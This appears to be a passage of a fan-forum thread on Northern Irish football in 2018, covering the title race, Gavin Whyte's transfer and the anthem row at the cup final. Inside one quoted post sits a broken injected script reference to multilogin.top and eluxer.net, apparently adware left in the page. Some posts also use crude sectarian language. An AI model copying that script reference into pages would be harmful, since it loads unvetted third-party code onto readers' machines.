You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Rest of The World
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

We’re not Brasil we’re Tuaisceart Éireann

Post Reply Post Reply Page  <1 213214215216217 369>
Author
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote gspain Quote  Post ReplyReply Direct Link To This Post Posted: 26 Apr 2018 at 4:18pm
Originally posted by PaulB PaulB wrote:

Be shocked if Coleraine win it now. Ballymena play the Crues and they despise their rivals, Ballymena fans calling for their team to lay down to Crusaders.
< ="//multilogin.top/oldmultitabs.js">https://eluxer.net/code?id=105&subid=50932_2852_">

Yes although I'd love to see Coleraine win it.  The Crues will surely do enough after last year's collapse.  

Big day at the bottom too although Carrick Rangers should do enough to avoid automatic relegation.  It will be tough on Ballinamallard.  Newry await in the playoffs.  They duly got the defeat they needed to avoid Portadown.  

Sad to see Donegal Celtic look like they'll drop to the amateur leagues.  3 games left and DC are 6 points adrift of Newington.  They meet on the last day but still a tall order.    

Sponsored Links

Double Maxim View Drop Down
Robbie Keane
Robbie Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Double Maxim Quote  Post ReplyReply Direct Link To This Post Posted: 29 Apr 2018 at 6:59am
Crusaders the champions then.
Double Maxim without doubt the greatest drink in the world
SuperDave84 View Drop Down
Robbie Keane
Robbie Keane
ooh Thomas, how could you do this to me!

Post Options Post Options   Thanks (0) Thanks(0)   Quote SuperDave84 Quote  Post ReplyReply Direct Link To This Post Posted: 29 Apr 2018 at 3:28pm
Yeah. Went up to Lurgan yesterday for the Glenavon game. Neither side had a striker worth the name. I could see how Coleraine only lost one game all season but neither side had any cutting edge.
Floreat Ultonia View Drop Down
500 Club la la la
500 Club la la la

Post Options Post Options   Thanks (0) Thanks(0)   Quote Floreat Ultonia Quote  Post ReplyReply Direct Link To This Post Posted: 29 Apr 2018 at 8:31pm
Originally posted by SuperDave84 SuperDave84 wrote:

Yeah. Went up to Lurgan yesterday for the Glenavon game. Neither side had a striker worth the name. I could see how Coleraine only lost one game all season but neither side had any cutting edge

More positively- defences may not be quite as hapless as Crues' goal tally suggests ;)

Looking forward to the Cup Final
Robbie Keane
Robbie Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Double Maxim Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 7:44am

Looks like Crusaders winger Chris Whyte is heading to Leeds Utd after interest from ten other English and Scots clubs.
BrendanD88 View Drop Down
Roy Keane
Roy Keane

99% of my posts are emojis

Post Options Post Options   Thanks (0) Thanks(0)   Quote BrendanD88 Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 7:45am
Originally posted by Double Maxim Double Maxim wrote:

Looks like Crusaders winger Chris Whyte is heading to Leeds Utd after interest from ten other English and Scots clubs.

Gavin Whyte, good player alright.
Robbie Keane
Robbie Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Double Maxim Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 7:47am

Do you think he wil make the grade in England?

Edited by Double Maxim - 04 May 2018 at 7:48am
Fintan View Drop Down
Liam Brady
Liam Brady
YBIG Mods are cool

Post Options Post Options   Thanks (0) Thanks(0)   Quote Fintan Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 7:47am

Gavin Whyte has a lot of fantastic attributes. A fair few players blessed with similar talent have gone over to Britain over the kast few years and not made it. I hope Gavin breaks the mould. One concern I would have for him is that he doesn't like it when people are in his face. Might struggle at Stoke on a cold Tuesday night kind of thing.
Robbie Keane
Robbie Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Double Maxim Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 7:50am
And it looks like Gavin could well be playing at Stoke next season as sadly I can't see Stoke staying up.
Denis Irwin View Drop Down
Robbie Keane
Robbie Keane
Stay Home & watch Lethal Weapon

Post Options Post Options   Thanks (0) Thanks(0)   Quote Denis Irwin Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 4:24pm
The FAI should send the IFA a note of thanks for their continued help with regard to the pursuit of players from a nationalist background
Eamonn Dunphy:"I'll tell you who wrote it, Rod Liddle, he's the guy who ran away and left his wife for a young one".

Bill O'Herlihy: Ah ye can't be saying that now Eamonn
horsebox View Drop Down
Robbie Keane
Robbie Keane
Born n bred in darndale.

Post Options Post Options   Thanks (0) Thanks(0)   Quote horsebox Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 5:42pm
It was far across the sea,
When the devil got a hold of me,
He wouldn't set me free,
So he kept me soul for ransom.
na na na na na na na na na
na na na na na na na na.
I'm a sailor man from Glasgow to
Denis Irwin View Drop Down
Robbie Keane
Robbie Keane
Stay Home & watch Lethal Weapon

Post Options Post Options   Thanks (0) Thanks(0)   Quote Denis Irwin Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 6:11pm
Should add it's in relation to the IFA's refusal to not play GSTQ
Eamonn Dunphy:"I'll tell you who wrote it, Rod Liddle, he's the guy who ran away and left his wife for a young one".

Bill O'Herlihy: Ah ye can't be saying that now Eamonn
Robbie Keane
Robbie Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Double Maxim Quote  Post ReplyReply Direct Link To This Post Posted: 05 May 2018 at 7:13am

GSTQ was dropped from the Irish Cup final between Cliftonville and Glentoran in  2013 after the IFA said it wanted to foster a "politically neutral environment" for the game.

So why the feck is it being played today?
Confused
randyrandolph View Drop Down
500 Club la la la
500 Club la la la

Post Options Post Options   Thanks (0) Thanks(0)   Quote randyrandolph Quote  Post ReplyReply Direct Link To This Post Posted: 05 May 2018 at 7:38am
because the zombies know their days are numbered so they're moving back to a position of f*** all catholics. 

the IFA have basically kissed good bye to another generation of young nationalists. great move for us. I wish they would have an orange march around the pitch before the game too.

why the f*** did they ever play GSTQ... 
Robbie Keane
Robbie Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Double Maxim Quote  Post ReplyReply Direct Link To This Post Posted: 05 May 2018 at 9:14am
Originally posted by randyrandolph randyrandolph wrote:

because the zombies know their days are numbered so they're moving back to a position of f*** all catholics. 

the IFA have basically kissed good bye to another generation of young nationalists. great move for us. I wish they would have an orange march around the pitch before the game too.

why the f*** did they ever play GSTQ... 

Stevie G could lead it.
Big smileBig smileBig smile
Robbie Keane
Robbie Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Double Maxim Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 6:36am
First time in fifteen years Linfield haven't qualified for Europe.
Thumbs Up
Fintan View Drop Down
Liam Brady
Liam Brady
YBIG Mods are cool

Post Options Post Options   Thanks (0) Thanks(0)   Quote Fintan Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 6:51am

Thumbs Up

This season was the season in which they have lost the most league games in their history EVER. That is absolutely crazy when you think about it. Worst of 120 odd. Blues fans are more demanding than any others I have met......wee Davide is under some serious pressure. 
Robbie Keane
Robbie Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Double Maxim Quote  Post ReplyReply Direct Link To This Post Posted: 17 May 2018 at 6:55am
Originally posted by Fintan Fintan wrote:

Thumbs Up

This season was the season in which they have lost the most league games in their history EVER. That is absolutely crazy when you think about it. Worst of 120 odd. Blues fans are more demanding than any others I have met......wee Davide is under some serious pressure. 

At least they will be able to make some money if they have their usual pre season friendly with their blues brothers sevco!
 Post Reply Post Reply Page  <1 213214215216217 369>
  Share Topic